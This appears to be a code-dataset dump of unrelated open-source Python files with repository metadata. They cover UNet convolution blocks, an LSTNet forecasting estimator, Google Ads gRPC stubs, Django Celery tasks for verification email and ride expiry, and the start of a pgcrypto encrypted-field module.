x = self.conv1(x)
if self.batchnorm:
x = self.norm1(x)
x = self.relu(x)
x = self.conv2(x)
if self.batchnorm:
x = self.norm2(x)
x = self.relu(x)
return x
def UpConv(in_channels, out_channels, dim, mode="transpose"):
if mode == "transpose":
return eval(
"nn.ConvTranspose{0}(in_channels, out_channels, kernel_size=2, "
"stride=2)".format(dim))
elif mode == "upsample":
# out_channels is always going to be the same as in_channels
return nn.Sequential(collections.OrderedDict([
("up", nn.Upsample(mode="nearest", scale_factor=2)),
("conv1x", Conv1x1x1(in_channels, out_channels, dim))]))
# else:
# return eval(
# "nn.MaxUnpool{0}(2)".format(dim)
# )
def Conv1x1x1(in_channels, out_channels, dim, groups=1):
return eval(
"nn.Conv{0}(in_channels, out_channels, kernel_size=1, groups=groups, "
"stride=1)".format(dim))
class Down(nn.Module):
"""
A helper Module that performs 2 convolutions and 1 MaxPool.
A ReLU activation and optionally a BatchNorm follows each convolution.
"""
def __init__(self, in_channels, out_channels, dim, pooling=True,
down_mode='maxpool', batchnorm=True, skip_connections=False):
super(Down, self).__init__()
self.pooling = pooling
self.down_mode = down_mode
self.skip_connections = skip_connections
if self.down_mode == "maxpool":
self.maxpool = eval("nn.MaxPool{0}(2)".format(dim))
self.doubleconv = DoubleConv(in_channels, out_channels, dim, batchnorm=batchnorm)
else:
self.downconv = eval("nn.Conv{0}(in_channels, out_channels, kernel_size=2, stride=2)".format(dim))
if self.pooling:
self.doubleconv = DoubleConv(out_channels, out_channels, dim, batchnorm=batchnorm)
else:
self.doubleconv = DoubleConv(in_channels, out_channels, dim, batchnorm=batchnorm)
def forward(self, x):
if self.down_mode == "maxpool":
if self.pooling:
x = self.maxpool(x)
x = self.doubleconv(x)
else:
if self.pooling:
x_down = self.downconv(x)
x = self.doubleconv(x_down)
if self.skip_connections:
x = x + x_down
else:
x = self.doubleconv(x)
return x
class Up(nn.Module):
"""
A helper Module that performs 2 convolutions and 1 UpConvolution.
A ReLU activation and optionally a BatchNorm follows each convolution.
"""
def __init__(self, in_channels, out_channels, dim, merge_mode="concat",
up_mode="transpose", batchnorm=True, skip_connections=False):
super(Up, self).__init__()
self.merge_mode = merge_mode
self.skip_connections = skip_connections
self.up_mode = up_mode
self.upconv = UpConv(in_channels, out_channels, dim, mode=up_mode)
if self.merge_mode == "concat":
self.doubleconv = DoubleConv(in_channels, out_channels, dim, batchnorm=batchnorm)
else:
self.doubleconv = DoubleConv(out_channels, out_channels, dim, batchnorm=batchnorm)
def forward(self, x_down, x_up):
x_down = self.upconv(x_down)
if self.merge_mode == "concat":
x = torch.cat((x_up, x_down), dim=1)
elif self.merge_mode == "add":
x = x_up + x_down
else:
x = x_down
x = self.doubleconv(x)
if self.skip_connections:
x = x + x_down
return x
| 6,489 | 14 | 358 |
d7b9d85d7abdc6211c2282d0512cf4ac7d2aadf3 | 113 | py | Python | AlgoMethod/dp/simple_dp/03.py | Nishi05/Competitive-programming | e59a6755b706d9d5c1f359f4511d92c114e6a94e | [
"MIT"
] | null | null | null | AlgoMethod/dp/simple_dp/03.py | Nishi05/Competitive-programming | e59a6755b706d9d5c1f359f4511d92c114e6a94e | [
"MIT"
] | null | null | null | AlgoMethod/dp/simple_dp/03.py | Nishi05/Competitive-programming | e59a6755b706d9d5c1f359f4511d92c114e6a94e | [
"MIT"
] | null | null | null | n = int(input())
F = [0]*(n+1)
F[0], F[1] = 0, 1
for i in range(2, n+1):
F[i] = F[i-1] + F[i-2]
print(F[n])
| 14.125 | 26 | 0.424779 | n = int(input())
F = [0]*(n+1)
F[0], F[1] = 0, 1
for i in range(2, n+1):
F[i] = F[i-1] + F[i-2]
print(F[n])
| 0 | 0 | 0 |
e6d489f5056d991fbe7591b3c1f265cf7f919903 | 5,917 | py | Python | pts/model/lstnet/lstnet_estimator.py | nitinthedreamer/pytorch-ts | 7f81b2fbab2e8913792d841b0d66deb489ee6185 | [
"Apache-2.0",
"MIT"
] | 647 | 2020-03-16T16:47:50.000Z | 2022-03-31T23:29:40.000Z | pts/model/lstnet/lstnet_estimator.py | nitinthedreamer/pytorch-ts | 7f81b2fbab2e8913792d841b0d66deb489ee6185 | [
"Apache-2.0",
"MIT"
] | 71 | 2020-03-17T10:58:14.000Z | 2022-03-23T08:53:12.000Z | pts/model/lstnet/lstnet_estimator.py | nitinthedreamer/pytorch-ts | 7f81b2fbab2e8913792d841b0d66deb489ee6185 | [
"Apache-2.0",
"MIT"
] | 110 | 2020-03-16T17:39:45.000Z | 2022-03-25T22:26:39.000Z | from typing import List, Optional
import numpy as np
import torch
import torch.nn as nn
from gluonts.core.component import validated
from gluonts.dataset.field_names import FieldName
from gluonts.torch.util import copy_parameters
from gluonts.torch.model.predictor import PyTorchPredictor
from gluonts.model.predictor import Predictor
from gluonts.transform import (
InstanceSplitter,
ValidationSplitSampler,
TestSplitSampler,
Transformation,
Chain,
ExpectedNumInstanceSampler,
AddObservedValuesIndicator,
AsNumpyArray,
)
from pts.model import PyTorchEstimator
from pts import Trainer
from pts.model.utils import get_module_forward_input_names
from .lstnet_network import LSTNetTrain, LSTNetPredict
| 34.805882 | 88 | 0.653034 | from typing import List, Optional
import numpy as np
import torch
import torch.nn as nn
from gluonts.core.component import validated
from gluonts.dataset.field_names import FieldName
from gluonts.torch.util import copy_parameters
from gluonts.torch.model.predictor import PyTorchPredictor
from gluonts.model.predictor import Predictor
from gluonts.transform import (
InstanceSplitter,
ValidationSplitSampler,
TestSplitSampler,
Transformation,
Chain,
ExpectedNumInstanceSampler,
AddObservedValuesIndicator,
AsNumpyArray,
)
from pts.model import PyTorchEstimator
from pts import Trainer
from pts.model.utils import get_module_forward_input_names
from .lstnet_network import LSTNetTrain, LSTNetPredict
class LSTNetEstimator(PyTorchEstimator):
@validated()
def __init__(
self,
freq: str,
prediction_length: Optional[int],
context_length: int,
num_series: int,
ar_window: int = 24,
skip_size: int = 24,
channels: int = 100,
kernel_size: int = 6,
horizon: Optional[int] = None,
trainer: Trainer = Trainer(),
dropout_rate: Optional[float] = 0.2,
output_activation: Optional[str] = None,
rnn_cell_type: str = "GRU",
rnn_num_cells: int = 100,
skip_rnn_cell_type: str = "GRU",
skip_rnn_num_cells: int = 5,
scaling: bool = True,
dtype: np.dtype = np.float32,
):
super().__init__(trainer, dtype=dtype)
self.freq = freq
self.num_series = num_series
self.skip_size = skip_size
self.ar_window = ar_window
self.horizon = horizon
self.prediction_length = prediction_length
self.future_length = horizon if horizon is not None else prediction_length
self.context_length = context_length
self.channels = channels
self.kernel_size = kernel_size
self.dropout_rate = dropout_rate
self.output_activation = output_activation
self.rnn_cell_type = rnn_cell_type
self.rnn_num_cells = rnn_num_cells
self.skip_rnn_cell_type = skip_rnn_cell_type
self.skip_rnn_num_cells = skip_rnn_num_cells
self.scaling = scaling
self.train_sampler = ExpectedNumInstanceSampler(
num_instances=1.0, min_future=self.future_length
)
self.validation_sampler = ValidationSplitSampler(min_future=self.future_length)
self.dtype = dtype
def create_transformation(self) -> Transformation:
return Chain(
trans=[
AsNumpyArray(field=FieldName.TARGET, expected_ndim=2, dtype=self.dtype),
AddObservedValuesIndicator(
target_field=FieldName.TARGET,
output_field=FieldName.OBSERVED_VALUES,
dtype=self.dtype,
),
]
)
def create_instance_splitter(self, mode: str):
assert mode in ["training", "validation", "test"]
instance_sampler = {
"training": self.train_sampler,
"validation": self.validation_sampler,
"test": TestSplitSampler(),
}[mode]
return InstanceSplitter(
target_field=FieldName.TARGET,
is_pad_field=FieldName.IS_PAD,
start_field=FieldName.START,
forecast_start_field=FieldName.FORECAST_START,
instance_sampler=instance_sampler,
time_series_fields=[FieldName.OBSERVED_VALUES],
past_length=self.context_length,
future_length=self.future_length,
output_NTC=False,
)
def create_training_network(self, device: torch.device) -> LSTNetTrain:
return LSTNetTrain(
num_series=self.num_series,
channels=self.channels,
kernel_size=self.kernel_size,
rnn_cell_type=self.rnn_cell_type,
rnn_num_cells=self.rnn_num_cells,
skip_rnn_cell_type=self.skip_rnn_cell_type,
skip_rnn_num_cells=self.skip_rnn_num_cells,
skip_size=self.skip_size,
ar_window=self.ar_window,
context_length=self.context_length,
horizon=self.horizon,
prediction_length=self.prediction_length,
dropout_rate=self.dropout_rate,
output_activation=self.output_activation,
scaling=self.scaling,
).to(device)
def create_predictor(
self,
transformation: Transformation,
trained_network: LSTNetTrain,
device: torch.device,
) -> PyTorchPredictor:
prediction_network = LSTNetPredict(
num_series=self.num_series,
channels=self.channels,
kernel_size=self.kernel_size,
rnn_cell_type=self.rnn_cell_type,
rnn_num_cells=self.rnn_num_cells,
skip_rnn_cell_type=self.skip_rnn_cell_type,
skip_rnn_num_cells=self.skip_rnn_num_cells,
skip_size=self.skip_size,
ar_window=self.ar_window,
context_length=self.context_length,
horizon=self.horizon,
prediction_length=self.prediction_length,
dropout_rate=self.dropout_rate,
output_activation=self.output_activation,
scaling=self.scaling,
).to(device)
copy_parameters(trained_network, prediction_network)
input_names = get_module_forward_input_names(prediction_network)
prediction_splitter = self.create_instance_splitter("test")
return PyTorchPredictor(
input_transform=transformation + prediction_splitter,
input_names=input_names,
prediction_net=prediction_network,
batch_size=self.trainer.batch_size,
freq=self.freq,
prediction_length=self.horizon or self.prediction_length,
device=device,
)
| 4,988 | 170 | 23 |
7a66572067f8305e5b63b5c06553c18be4e3c50c | 829 | py | Python | python/utils.py | oliche/NeuropixelsRegistration | 6dc97ea46f531f2adaf2cf2cf5277d6aaf499e88 | [
"MIT"
] | 7 | 2021-01-25T17:29:53.000Z | 2022-02-20T23:13:15.000Z | python/utils.py | oliche/NeuropixelsRegistration | 6dc97ea46f531f2adaf2cf2cf5277d6aaf499e88 | [
"MIT"
] | 1 | 2021-04-08T04:10:54.000Z | 2022-01-28T09:35:38.000Z | python/utils.py | oliche/NeuropixelsRegistration | 6dc97ea46f531f2adaf2cf2cf5277d6aaf499e88 | [
"MIT"
] | 2 | 2021-01-25T17:29:56.000Z | 2022-02-04T14:09:14.000Z | import numpy as np
from scipy.io import loadmat
import os | 31.884615 | 79 | 0.677925 | import numpy as np
from scipy.io import loadmat
import os
def mat2npy(mat_chanmap_dir):
mat_chanmap = loadmat(mat_chanmap_dir)
x = mat_chanmap['xcoords']
y = mat_chanmap['ycoords']
npy_chanmap = np.hstack([x,y])
np.save('chanmap.npy', npy_chanmap)
return npy_chanmap
def merge_filtered_files(filtered_location, output_directory, delete=True):
filenames = os.listdir(filtered_location)
filenames_sorted = sorted(filenames)
f_out = os.path.join(output_directory, "standardized.bin")
f = open(f_out, 'wb')
for fname in filenames_sorted:
if '.ipynb' in fname:
continue
res = np.load(os.path.join(filtered_location, fname)).astype('float32')
res.tofile(f)
if delete==True:
os.remove(os.path.join(filtered_location, fname)) | 726 | 0 | 46 |
f5f389bfc7ade10eb551a3065beaed24b6f9f866 | 2,295 | py | Python | google/ads/google_ads/v4/proto/services/income_range_view_service_pb2_grpc.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | 1 | 2021-04-09T04:28:47.000Z | 2021-04-09T04:28:47.000Z | google/ads/google_ads/v4/proto/services/income_range_view_service_pb2_grpc.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/v4/proto/services/income_range_view_service_pb2_grpc.py | arammaliachi/google-ads-python | a4fe89567bd43eb784410523a6306b5d1dd9ee67 | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v4.proto.resources import income_range_view_pb2 as google_dot_ads_dot_googleads__v4_dot_proto_dot_resources_dot_income__range__view__pb2
from google.ads.google_ads.v4.proto.services import income_range_view_service_pb2 as google_dot_ads_dot_googleads__v4_dot_proto_dot_services_dot_income__range__view__service__pb2
class IncomeRangeViewServiceStub(object):
"""Proto file describing the Income Range View service.
Service to manage income range views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetIncomeRangeView = channel.unary_unary(
'/google.ads.googleads.v4.services.IncomeRangeViewService/GetIncomeRangeView',
request_serializer=google_dot_ads_dot_googleads__v4_dot_proto_dot_services_dot_income__range__view__service__pb2.GetIncomeRangeViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v4_dot_proto_dot_resources_dot_income__range__view__pb2.IncomeRangeView.FromString,
)
class IncomeRangeViewServiceServicer(object):
"""Proto file describing the Income Range View service.
Service to manage income range views.
"""
def GetIncomeRangeView(self, request, context):
"""Returns the requested income range view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
| 44.134615 | 178 | 0.817865 | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v4.proto.resources import income_range_view_pb2 as google_dot_ads_dot_googleads__v4_dot_proto_dot_resources_dot_income__range__view__pb2
from google.ads.google_ads.v4.proto.services import income_range_view_service_pb2 as google_dot_ads_dot_googleads__v4_dot_proto_dot_services_dot_income__range__view__service__pb2
class IncomeRangeViewServiceStub(object):
"""Proto file describing the Income Range View service.
Service to manage income range views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetIncomeRangeView = channel.unary_unary(
'/google.ads.googleads.v4.services.IncomeRangeViewService/GetIncomeRangeView',
request_serializer=google_dot_ads_dot_googleads__v4_dot_proto_dot_services_dot_income__range__view__service__pb2.GetIncomeRangeViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v4_dot_proto_dot_resources_dot_income__range__view__pb2.IncomeRangeView.FromString,
)
class IncomeRangeViewServiceServicer(object):
"""Proto file describing the Income Range View service.
Service to manage income range views.
"""
def GetIncomeRangeView(self, request, context):
"""Returns the requested income range view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_IncomeRangeViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetIncomeRangeView': grpc.unary_unary_rpc_method_handler(
servicer.GetIncomeRangeView,
request_deserializer=google_dot_ads_dot_googleads__v4_dot_proto_dot_services_dot_income__range__view__service__pb2.GetIncomeRangeViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v4_dot_proto_dot_resources_dot_income__range__view__pb2.IncomeRangeView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v4.services.IncomeRangeViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 701 | 0 | 23 |
d4c77b1a26c287554651e6a15191ae129fda0e2d | 528 | py | Python | images/migrations/0004_auto_20160606_1603.py | OpenCanada/website | 6334ff412addc0562ac247080194e5d182e8e924 | [
"MIT"
] | 10 | 2015-12-18T16:41:33.000Z | 2018-11-11T08:36:46.000Z | images/migrations/0004_auto_20160606_1603.py | OpenCanada/website | 6334ff412addc0562ac247080194e5d182e8e924 | [
"MIT"
] | 96 | 2015-07-14T22:45:56.000Z | 2017-07-25T19:59:48.000Z | images/migrations/0004_auto_20160606_1603.py | OpenCanada/website | 6334ff412addc0562ac247080194e5d182e8e924 | [
"MIT"
] | 9 | 2015-07-28T14:38:43.000Z | 2019-01-04T17:38:42.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import wagtail.images.models
| 25.142857 | 137 | 0.666667 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import wagtail.images.models
class Migration(migrations.Migration):
dependencies = [
('images', '0003_auto_20160405_1542'),
]
operations = [
migrations.AlterField(
model_name='attributedrendition',
name='file',
field=models.ImageField(height_field='height', width_field='width', upload_to=wagtail.images.models.get_rendition_upload_to),
),
]
| 0 | 369 | 23 |
1ee85e632b42753a0f412f31534072b3a6255c3d | 1,851 | py | Python | make_phr2sg_id.py | Kyubyong/msg_reply | 046f6308785d8e65d7ae429964df40a001a9675d | [
"Apache-2.0"
] | 79 | 2019-05-21T06:41:46.000Z | 2021-08-06T13:07:38.000Z | make_phr2sg_id.py | abhijitdalavi/msg_reply | 046f6308785d8e65d7ae429964df40a001a9675d | [
"Apache-2.0"
] | 2 | 2019-05-28T19:28:24.000Z | 2020-04-07T01:17:45.000Z | make_phr2sg_id.py | abhijitdalavi/msg_reply | 046f6308785d8e65d7ae429964df40a001a9675d | [
"Apache-2.0"
] | 16 | 2019-05-27T06:10:38.000Z | 2020-10-21T06:19:21.000Z | '''
Make two dictionaries: phr2sg_id and sg_id2phr
phr2sg_id["nice work']==6152
phr2sg_id["nicely done']==6152
phr2sg_id["nice going']==6152
sg_id2phr[6152]=="Well done."
'''
import json, os
import operator
import pickle
from hparams import hp
import re
from tqdm import tqdm
if __name__ == "__main__":
print("Determine the most frequent Synonym Groups")
data = json.load(open(hp.sg))
sg_id2cnt = dict()
for sg_id, sg in tqdm(data.items()):
sg_id = int(sg_id)
phrs = sg["phrases"] # [['i am mormon', 1], ["i'm a mormon", 1]]
sg_cnt = 0 # total cnt
for phr, cnt in phrs:
if cnt >= hp.min_cnt:
sg_cnt += cnt
sg_id2cnt[sg_id] = sg_cnt
sg_id_cnt = sorted(sg_id2cnt.items(), key=operator.itemgetter(1), reverse=True)
sg_ids = [sg_id for sg_id, _ in sg_id_cnt][:hp.n_phrs]
print("Determine the group of phrases")
sg_id2phr = dict()
phr2sg_id, phr2cnt = dict(), dict()
for sg_id in tqdm(sg_ids):
sg = data[str(sg_id)]
phrs = sg["phrases"] # [['i am mormon', 1], ["i'm a mormon", 1]]
sg_id2phr[sg_id] = phrs[0][0]
for phr, cnt in phrs:
if cnt >= hp.min_cnt:
phr = refine(phr)
if phr in phr2cnt and cnt > phr2cnt[phr]: # overwrite
phr2cnt[phr] = cnt
phr2sg_id[phr] = sg_id
else:
phr2cnt[phr] = cnt
phr2sg_id[phr] = sg_id
print("save")
os.makedirs(os.path.dirname(hp.phr2sg_id), exist_ok=True)
os.makedirs(os.path.dirname(hp.sg_id2phr), exist_ok=True)
pickle.dump(phr2sg_id, open(hp.phr2sg_id, 'wb'))
pickle.dump(sg_id2phr, open(hp.sg_id2phr, 'wb')) | 29.380952 | 83 | 0.579687 | '''
Make two dictionaries: phr2sg_id and sg_id2phr
phr2sg_id["nice work']==6152
phr2sg_id["nicely done']==6152
phr2sg_id["nice going']==6152
sg_id2phr[6152]=="Well done."
'''
import json, os
import operator
import pickle
from hparams import hp
import re
from tqdm import tqdm
def refine(text):
text = text.lower()
text = re.sub("[^ A-Za-z]", "", text)
return text
if __name__ == "__main__":
print("Determine the most frequent Synonym Groups")
data = json.load(open(hp.sg))
sg_id2cnt = dict()
for sg_id, sg in tqdm(data.items()):
sg_id = int(sg_id)
phrs = sg["phrases"] # [['i am mormon', 1], ["i'm a mormon", 1]]
sg_cnt = 0 # total cnt
for phr, cnt in phrs:
if cnt >= hp.min_cnt:
sg_cnt += cnt
sg_id2cnt[sg_id] = sg_cnt
sg_id_cnt = sorted(sg_id2cnt.items(), key=operator.itemgetter(1), reverse=True)
sg_ids = [sg_id for sg_id, _ in sg_id_cnt][:hp.n_phrs]
print("Determine the group of phrases")
sg_id2phr = dict()
phr2sg_id, phr2cnt = dict(), dict()
for sg_id in tqdm(sg_ids):
sg = data[str(sg_id)]
phrs = sg["phrases"] # [['i am mormon', 1], ["i'm a mormon", 1]]
sg_id2phr[sg_id] = phrs[0][0]
for phr, cnt in phrs:
if cnt >= hp.min_cnt:
phr = refine(phr)
if phr in phr2cnt and cnt > phr2cnt[phr]: # overwrite
phr2cnt[phr] = cnt
phr2sg_id[phr] = sg_id
else:
phr2cnt[phr] = cnt
phr2sg_id[phr] = sg_id
print("save")
os.makedirs(os.path.dirname(hp.phr2sg_id), exist_ok=True)
os.makedirs(os.path.dirname(hp.sg_id2phr), exist_ok=True)
pickle.dump(phr2sg_id, open(hp.phr2sg_id, 'wb'))
pickle.dump(sg_id2phr, open(hp.sg_id2phr, 'wb')) | 78 | 0 | 23 |
9ce2a8640535b80e39865e972b8191dfea0819ec | 3,922 | py | Python | cride/taskapp/tasks.py | jecs580/django_second_app | ef04b48342ef560eac8f58540ba684e5eb7d7926 | [
"MIT"
] | null | null | null | cride/taskapp/tasks.py | jecs580/django_second_app | ef04b48342ef560eac8f58540ba684e5eb7d7926 | [
"MIT"
] | 2 | 2019-12-24T00:03:49.000Z | 2019-12-24T00:03:50.000Z | cride/taskapp/tasks.py | jecs580/django_second_app | ef04b48342ef560eac8f58540ba684e5eb7d7926 | [
"MIT"
] | null | null | null | """Tareas de Celery."""
# Django
from django.conf import settings
from django.template.loader import render_to_string
from django.utils import timezone
from django.core.mail import EmailMultiAlternatives
# Utilities
import jwt
from datetime import timedelta
# Celery
from celery.decorators import task, periodic_task
# Models
from cride.users.models import User
from cride.rides.models import Ride
def gen_verification_token(user):
"""Crea un token JWT que el usuario pueda usar para verificar su cuenta"""
# El self se utiliza para que la funcion pueda usar los atributos de la clase.
exp_date = timezone.now()+timedelta(days=3)
payload = {
'user': user.username,
'exp': int(exp_date.timestamp()),
'type': 'email_confirmation' # Creamos una variable que especifique de que es el token, se lo usa
# cuando tu proyecto genera mas JWT en otras aplicaciones y no queremos que se confundan.
}
token = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')
return token.decode() # regresamos el token en cadena
@task(name='send_confirmation_email', max_retries=3) # Especificamos que estas son tareas de celery.
# Este decorator recibira el nombre de la tarea, y la otra es el maximo numero de veces que intentara
# ejecutar la tarea en caso de que ocurra errores
def send_confirmation_email(user_pk): # Quitamos self del metodo por que ya no estan dentro de una clase,
# Cuando usamos celery en funciones es recomendado no enviar datos complejos como instancias de clases.
# Es mejor usar solo datos nativos como enteros, strings,etc.
"""Envia un enlace de verificación de cuenta a usuario dado
Enviando un email al usuario para verificar la cuenta
"""
user = User.objects.get(pk=user_pk) # Obtenemos el usuario por su pk
verification_token = gen_verification_token(user)
subject = 'Bienvenido @{}! Verifica tu cuenta para empezar a usar Comparte-Ride'.format(user.username)
from_email = 'Comparte Ride <noreply@comparteride.com>'
content = render_to_string(
'emails/users/account_verification.html',
{'token': verification_token, 'user': user}
) # Esta variable se usara en caso de que el usario no pueda interpretar el contenido html que se le
# envio, # El metodo render_to_string(), ayuda a no tener otra variable en caso de que no funcione el html
# html_content = '<p>This is an <strong>important</strong> message.</p>' # Esta variable era del
# contenido con html pero con la otra variable matamos 2 pajaros de un tiro.
msg = EmailMultiAlternatives(
subject,
content,
from_email,
[user.email] # Lista de direcciones de correos a enviar
) # El EmailMultiAlternative se utiliza para enviar emails que contengan un contenido de html,
msg.attach_alternative(
content, # En esta variable agregas la variable con el html pero enviamos content, que posee los 2.
"text/html")
msg.send()
# Usaremos los JWT para enviar la informacion del usuario sin necesidad de guardarlo en la base de datos.
@periodic_task(name='disable_finished_rides', run_every=timedelta(minutes=5))
# Esta tarea sera llamada cada 5 segundos
def disable_finished_rides():
"""Desactiva viajes terminados.
Este metodo servira para desactivar los rides una vez que termine
su hora de llegada, esto sera como un soporte para cuando el creador
del viaje se olvide desactivar el viaje.
"""
now = timezone.now()
offset = now + timedelta(seconds=5)
# Actualiza los paseos que ya han terminado // now <= arrival_date <= offset
rides = Ride.objects.filter(arrival_date__gte=now, is_active=True, arrival_date__lte=offset)
rides.update(is_active=False)
| 46.690476 | 114 | 0.703723 | """Tareas de Celery."""
# Django
from django.conf import settings
from django.template.loader import render_to_string
from django.utils import timezone
from django.core.mail import EmailMultiAlternatives
# Utilities
import jwt
from datetime import timedelta
# Celery
from celery.decorators import task, periodic_task
# Models
from cride.users.models import User
from cride.rides.models import Ride
def gen_verification_token(user):
"""Crea un token JWT que el usuario pueda usar para verificar su cuenta"""
# El self se utiliza para que la funcion pueda usar los atributos de la clase.
exp_date = timezone.now()+timedelta(days=3)
payload = {
'user': user.username,
'exp': int(exp_date.timestamp()),
'type': 'email_confirmation' # Creamos una variable que especifique de que es el token, se lo usa
# cuando tu proyecto genera mas JWT en otras aplicaciones y no queremos que se confundan.
}
token = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')
return token.decode() # regresamos el token en cadena
@task(name='send_confirmation_email', max_retries=3) # Especificamos que estas son tareas de celery.
# Este decorator recibira el nombre de la tarea, y la otra es el maximo numero de veces que intentara
# ejecutar la tarea en caso de que ocurra errores
def send_confirmation_email(user_pk): # Quitamos self del metodo por que ya no estan dentro de una clase,
# Cuando usamos celery en funciones es recomendado no enviar datos complejos como instancias de clases.
# Es mejor usar solo datos nativos como enteros, strings,etc.
"""Envia un enlace de verificación de cuenta a usuario dado
Enviando un email al usuario para verificar la cuenta
"""
user = User.objects.get(pk=user_pk) # Obtenemos el usuario por su pk
verification_token = gen_verification_token(user)
subject = 'Bienvenido @{}! Verifica tu cuenta para empezar a usar Comparte-Ride'.format(user.username)
from_email = 'Comparte Ride <noreply@comparteride.com>'
content = render_to_string(
'emails/users/account_verification.html',
{'token': verification_token, 'user': user}
) # Esta variable se usara en caso de que el usario no pueda interpretar el contenido html que se le
# envio, # El metodo render_to_string(), ayuda a no tener otra variable en caso de que no funcione el html
# html_content = '<p>This is an <strong>important</strong> message.</p>' # Esta variable era del
# contenido con html pero con la otra variable matamos 2 pajaros de un tiro.
msg = EmailMultiAlternatives(
subject,
content,
from_email,
[user.email] # Lista de direcciones de correos a enviar
) # El EmailMultiAlternative se utiliza para enviar emails que contengan un contenido de html,
msg.attach_alternative(
content, # En esta variable agregas la variable con el html pero enviamos content, que posee los 2.
"text/html")
msg.send()
# Usaremos los JWT para enviar la informacion del usuario sin necesidad de guardarlo en la base de datos.
@periodic_task(name='disable_finished_rides', run_every=timedelta(minutes=5))
# Esta tarea sera llamada cada 5 segundos
def disable_finished_rides():
"""Desactiva viajes terminados.
Este metodo servira para desactivar los rides una vez que termine
su hora de llegada, esto sera como un soporte para cuando el creador
del viaje se olvide desactivar el viaje.
"""
now = timezone.now()
offset = now + timedelta(seconds=5)
# Actualiza los paseos que ya han terminado // now <= arrival_date <= offset
rides = Ride.objects.filter(arrival_date__gte=now, is_active=True, arrival_date__lte=offset)
rides.update(is_active=False)
| 0 | 0 | 0 |
0360fb911ea98bc93a9c5ce44d7d498eacc0e89d | 727 | py | Python | solutions/balanced-brackets/my_balanced_brackets.py | DuncanDHall/the-coding-interview | 701f8aacea34336e084bc978b974fb4816ffff85 | [
"MIT"
] | null | null | null | solutions/balanced-brackets/my_balanced_brackets.py | DuncanDHall/the-coding-interview | 701f8aacea34336e084bc978b974fb4816ffff85 | [
"MIT"
] | null | null | null | solutions/balanced-brackets/my_balanced_brackets.py | DuncanDHall/the-coding-interview | 701f8aacea34336e084bc978b974fb4816ffff85 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Balanced Brackets
#
# Write a function that accepts a string consisting entiring of brackets
# (`[](){}`) and returns whether it is balanced. Every "opening" bracket must
# be followed by a closing bracket of the same type. There can also be nested
# brackets, which adhere to the same rule.
#
# ```js
# f('()[]{}(([])){[()][]}') // true
# f('())[]{}') // false
# f('[(])') // false
# ```
pairs = {
"(": ")",
"[": "]",
"{": "}"
}
| 22.030303 | 78 | 0.500688 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Balanced Brackets
#
# Write a function that accepts a string consisting entiring of brackets
# (`[](){}`) and returns whether it is balanced. Every "opening" bracket must
# be followed by a closing bracket of the same type. There can also be nested
# brackets, which adhere to the same rule.
#
# ```js
# f('()[]{}(([])){[()][]}') // true
# f('())[]{}') // false
# f('[(])') // false
# ```
pairs = {
"(": ")",
"[": "]",
"{": "}"
}
def sol1(s):
stack = []
for c in s:
if c in pairs.keys():
stack.append(c)
else:
if stack == [] or c != pairs[stack.pop()]:
return False
return stack == []
| 201 | 0 | 23 |
5d186bbf0c94ad97c379b5beb8f402cd5fe1c4a8 | 9,689 | py | Python | pgcrypto/fields.py | fabiopintodacosta/django-pgcrypto | 02108795ec97f80af92ff6800a1c55eb958c3496 | [
"BSD-2-Clause"
] | null | null | null | pgcrypto/fields.py | fabiopintodacosta/django-pgcrypto | 02108795ec97f80af92ff6800a1c55eb958c3496 | [
"BSD-2-Clause"
] | null | null | null | pgcrypto/fields.py | fabiopintodacosta/django-pgcrypto | 02108795ec97f80af92ff6800a1c55eb958c3496 | [
"BSD-2-Clause"
] | null | null | null | from django import forms
from django.conf import settings
from django.core import validators
from django.db import models
from django.utils import six, timezone
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
import django
from .base import aes_pad_key, armor, dearmor, pad, unpad
import datetime
import decimal
if django.VERSION >= (1, 7):
from django.db.models.lookups import Lookup
for lookup_name in ('exact', 'gt', 'gte', 'lt', 'lte'):
class_name = 'EncryptedLookup_%s' % lookup_name
lookup_class = type(class_name, (EncryptedLookup,), {'lookup_name': lookup_name})
BaseEncryptedField.register_lookup(lookup_class)
| 39.386179 | 119 | 0.655898 | from django import forms
from django.conf import settings
from django.core import validators
from django.db import models
from django.utils import six, timezone
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
import django
from .base import aes_pad_key, armor, dearmor, pad, unpad
import datetime
import decimal
class BaseEncryptedField (models.Field):
field_cast = ''
def __init__(self, *args, **kwargs):
# Just in case pgcrypto and/or pycrypto support more than AES/Blowfish.
valid_ciphers = getattr(settings, 'PGCRYPTO_VALID_CIPHERS', ('AES', 'Blowfish'))
self.cipher_name = kwargs.pop('cipher', getattr(settings, 'PGCRYPTO_DEFAULT_CIPHER', 'AES'))
assert self.cipher_name in valid_ciphers
self.cipher_key = kwargs.pop('key', getattr(settings, 'PGCRYPTO_DEFAULT_KEY', ''))
